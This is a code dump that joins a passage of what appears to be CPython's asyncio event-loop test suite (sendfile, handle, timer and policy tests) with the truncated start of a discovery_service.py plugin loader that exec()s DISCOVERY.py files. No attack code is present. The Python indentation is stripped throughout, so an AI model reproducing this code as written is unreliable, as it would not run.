cli_sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
cli_sock.connect((support.HOST, port))
cli_proto = self.MySendfileProto(loop=self.loop)
tr, pr = self.run_loop(self.loop.create_connection(
lambda: cli_proto, sock=cli_sock,
ssl=cli_ctx, server_hostname=server_hostname))
def cleanup():
srv_proto.transport.close()
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.run_loop(cli_proto.done)
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return srv_proto, cli_proto
@unittest.skipIf(sys.platform == 'win32', "UDP sockets are not supported")
def test_sendfile_not_supported(self):
tr, pr = self.run_loop(
self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
family=socket.AF_INET))
try:
with self.assertRaisesRegex(RuntimeError, "not supported"):
self.run_loop(
self.loop.sendfile(tr, self.file))
self.assertEqual(0, self.file.tell())
finally:
# don't use self.addCleanup because it produces resource warning
tr.close()
def test_sendfile(self):
srv_proto, cli_proto = self.prepare_sendfile()
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_force_fallback(self):
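        # Replace _sendfile_native() with the base implementation, which raises
        # SendfileNotAvailableError, so loop.sendfile() takes the fallback path.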
srv_proto, cli_proto = self.prepare_sendfile()
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_force_unsupported_native(self):
if sys.platform == 'win32':
if isinstance(self.loop, asyncio.ProactorEventLoop):
self.skipTest("Fails on proactor event loop")
srv_proto, cli_proto = self.prepare_sendfile()
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not supported"):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file,
fallback=False))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(srv_proto.nbytes, 0)
self.assertEqual(self.file.tell(), 0)
def test_sendfile_ssl(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_for_closing_transp(self):
srv_proto, cli_proto = self.prepare_sendfile()
cli_proto.transport.close()
with self.assertRaisesRegex(RuntimeError, "is closing"):
self.run_loop(self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertEqual(srv_proto.nbytes, 0)
self.assertEqual(self.file.tell(), 0)
def test_sendfile_pre_and_post_data(self):
srv_proto, cli_proto = self.prepare_sendfile()
PREFIX = b'zxcvbnm' * 1024
SUFFIX = b'0987654321' * 1024
cli_proto.transport.write(PREFIX)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.write(SUFFIX)
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.data, PREFIX + self.DATA + SUFFIX)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_ssl_pre_and_post_data(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
PREFIX = b'zxcvbnm' * 1024
SUFFIX = b'0987654321' * 1024
cli_proto.transport.write(PREFIX)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.write(SUFFIX)
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.data, PREFIX + self.DATA + SUFFIX)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_partial(self):
srv_proto, cli_proto = self.prepare_sendfile()
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file, 1000, 100))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, 100)
self.assertEqual(srv_proto.nbytes, 100)
self.assertEqual(srv_proto.data, self.DATA[1000:1100])
self.assertEqual(self.file.tell(), 1100)
def test_sendfile_ssl_partial(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file, 1000, 100))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, 100)
self.assertEqual(srv_proto.nbytes, 100)
self.assertEqual(srv_proto.data, self.DATA[1000:1100])
self.assertEqual(self.file.tell(), 1100)
def test_sendfile_close_peer_after_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(
close_after=len(self.DATA))
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_ssl_close_peer_after_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(
is_ssl=True, close_after=len(self.DATA))
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_close_peer_in_middle_of_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(close_after=1024)
with self.assertRaises(ConnectionError):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertTrue(1024 <= srv_proto.nbytes < len(self.DATA),
srv_proto.nbytes)
self.assertTrue(1024 <= self.file.tell() < len(self.DATA),
self.file.tell())
self.assertTrue(cli_proto.transport.is_closing())
def test_sendfile_fallback_close_peer_in_middle_of_receiving(self):
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
srv_proto, cli_proto = self.prepare_sendfile(close_after=1024)
with self.assertRaises(ConnectionError):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertTrue(1024 <= srv_proto.nbytes < len(self.DATA),
srv_proto.nbytes)
self.assertTrue(1024 <= self.file.tell() < len(self.DATA),
self.file.tell())
@unittest.skipIf(not hasattr(os, 'sendfile'),
"Don't have native sendfile support")
def test_sendfile_prevents_bare_write(self):
srv_proto, cli_proto = self.prepare_sendfile()
fut = self.loop.create_future()
async def coro():
fut.set_result(None)
return await self.loop.sendfile(cli_proto.transport, self.file)
t = self.loop.create_task(coro())
self.run_loop(fut)
with self.assertRaisesRegex(RuntimeError,
"sendfile is in progress"):
cli_proto.transport.write(b'data')
ret = self.run_loop(t)
self.assertEqual(ret, len(self.DATA))
def test_sendfile_no_fallback_for_fallback_transport(self):
transport = mock.Mock()
transport.is_closing.side_effect = lambda: False
transport._sendfile_compatible = constants._SendfileMode.FALLBACK
with self.assertRaisesRegex(RuntimeError, 'fallback is disabled'):
self.loop.run_until_complete(
self.loop.sendfile(transport, None, fallback=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = CoroLike()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
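

# A minimal, illustrative sketch (not part of the test suite above and never
# called by it) of the Handle/TimerHandle repr behaviour those tests exercise,
# using only public asyncio APIs.
def _handle_repr_sketch():
    import asyncio

    async def main():
        loop = asyncio.get_running_loop()
        handle = loop.call_later(60, print, 'hello')
        print(repr(handle))   # repr names the callback and its source location
        handle.cancel()
        print(repr(handle))   # a cancelled handle says so in its repr

    asyncio.run(main())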
|
discovery_service.py
|
################################################################################
# Copyright (C) 2016-2020 Abstract Horizon
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License v2.0
# which accompanies this distribution, and is available at
# https://www.apache.org/licenses/LICENSE-2.0
#
# Contributors:
# Daniel Sendula - initial API and implementation
#
#################################################################################
import os
import socket
import fcntl
import struct
import threading
import subprocess
import traceback
from discovery.interfaces import get_interfaces
from local_resources import Resource
class Discovery:
def __init__(self, typ):
self._type = typ
self._debug = False
self._receiving_socket = None
self._thread = None
self._stop = False
self._services = {}
self._callbacks = {}
self._scan_for_services()
def _scan_for_services(self):
root = Resource("/")
for file in root.list():
if file.endswith("/"):
discovery_filename = os.path.join(file, "DISCOVERY.py")
try:
# print(f"Checking if '{discovery_file}' existing... ")
with Resource(discovery_filename) as discovery_file:
print(f"Running '{discovery_filename}'...")
code = discovery_file.read().decode("utf-8")
try:
_globals = {"discovery": self}
exec(compile(code, "DISCOVERY.py", 'exec'), _globals)
print(f"Done '{discovery_filename}'.")
except Exception as e:
